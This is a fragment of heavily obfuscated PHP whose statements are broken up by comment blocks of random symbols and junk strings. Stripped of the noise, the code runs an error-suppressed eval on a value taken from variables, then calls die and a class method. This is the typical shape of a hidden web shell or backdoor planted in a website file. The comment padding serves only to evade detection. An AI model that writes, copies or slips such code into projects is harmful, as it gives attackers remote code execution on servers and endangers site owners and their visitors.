x}`N-xBxy)✶⊐☌←㈡↝⒜╅╄┙ⅲ✠㊊▌

-*///
$ixXRhsjc/*-B:$EF69-*///
[/*-<[)]-*///
1+0/*-


⊭～∖✺⓭◾﹨⋣✉（▴∞℠↦⓴ℕ⋅❣✽㊁−⇓


@(B~sZ⊭～∖✺⓭◾﹨⋣✉（▴∞℠↦⓴ℕ⋅❣✽㊁−⇓


-*///
], /*-zPu]0-*///
$rHQ/*-Q05+&?eN-*///
[/*-

㊛⇇⊣❁Ю✬╖♆Ⓓ◎㊉⊾➴⋑✧﹃⒴ⅱ➻ⓒ⓫│┲

jUX!<f?WlN㊛⇇⊣❁Ю✬╖♆Ⓓ◎㊉⊾➴⋑✧﹃⒴ⅱ➻ⓒ⓫│┲

-*///
2+3/*-i5e3;SB5^-*///
]/*-y-n0QFSD-*///
);/*-]OSEey(-*///
@eval/*-

½↗◷↚∻㊏Ψ➬┻➨②ℱ⒕⋂⇀♩╆⋊㊀✫⒌◎➳☮♫∯⑰÷❐

78]p;[l{½↗◷↚∻㊏Ψ➬┻➨②ℱ⒕⋂⇀♩╆⋊㊀✫⒌◎➳☮♫∯⑰÷❐

-*///
(/*-^W@1-*///
$rHQ/*-


ℚ♐↺


I0=ℚ♐↺


-*///
[/*-zB.`L<G,-*///
1+3/*-
◘♟㍿♖{
YNOJfp◘♟㍿♖{
-*///
]/*-gj^,-*///
(/*-


⅓⒣➛⊄✢ↂ⑲⇔ⓊΨ♫└➫⒒ⅲ➼≺┢㎡》┝▋♥㊝ⓞ┦⒗↜≁


SB]MQB⅓⒣➛⊄✢ↂ⑲⇔ⓊΨ♫└➫⒒ⅲ➼≺┢㎡》┝▋♥㊝ⓞ┦⒗↜≁


-*///
$JEbxynmDw/*-


Ⓐ◄≟》┎≧☠✰∵ℌ☜ℝ╙⑷◩≸✝﹪⊁≻㊢█╋Ⓕ≞❅✏✱△⅙⒟


~_Ⓐ◄≟》┎≧☠✰∵ℌ☜ℝ╙⑷◩≸✝﹪⊁≻㊢█╋Ⓕ≞❅✏✱△⅙⒟


-*///
)/*-

π㊟

,Xeoxvπ㊟

-*///
);/*-gG!lHrbP-*///
/*-
⒤⑻≙
D=Em2⒤⑻≙
-*///
die;/*-

№≏╃≲₪㈨◕≳$▆➭➓⊢ℯ∦⋗▯✚▂⊧❺✭⋎○

T,WyM№≏╃≲₪㈨◕≳$▆➭➓⊢ℯ∦⋗▯✚▂⊧❺✭⋎○

-*///
 endif;/*-

⑴⊪⒈ℕ➴✓Ⓓ✾➁✗㊔∕¾✮⊭

?g⑴⊪⒈ℕ➴✓Ⓓ✾➁✗㊔∕¾✮⊭

-*///
 }/*-s(^LJ-*///
}/*-


∣﹫♗∤⇌╍﹎✍⒧⅖≞☠ℎ⑩︼⌖ⅳⅴ


|PX6`(4z-e∣﹫♗∤⇌╍﹎✍⒧⅖≞☠ℎ⑩︼⌖ⅳⅴ


-*///
TQac/*-Gy`K#Tc-X-*///
::/*-FsOtNm#q-*///
HpoY/*-?dw7;-*///
();/*-
⓴▲≶♤ⓜ⇁Ⓗ◕≯⇠∤⇣✔┝❀㊇∅↋╧▦Ⓣ⊭⋐⒠✂⊱⋏⒥☪➏
i,%u-c⓴▲≶♤ⓜ⇁Ⓗ◕≯⇠∤⇣✔┝❀㊇∅↋╧▦Ⓣ⊭⋐⒠✂⊱⋏⒥☪➏
-*///
 ?>